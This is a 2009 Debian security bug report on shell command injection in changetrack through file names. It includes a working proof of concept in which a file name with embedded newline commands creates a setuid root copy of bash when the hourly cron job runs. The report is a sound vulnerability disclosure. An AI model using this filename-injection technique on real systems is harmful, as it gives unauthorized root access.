Secure testing team - Sep 2009 - Bug#546791: changetrack: shell command injection via filename

Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, ''stable'')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall''s Practical
Extraction

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


Its is posible, to run commands as root, if you have permision to create
files in directory chcked via changetrack, example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack shudnot use shell commands, or escape sh special
haracters like spaces enters ; etc...

-- 
  Regards
      Marek Grzybowski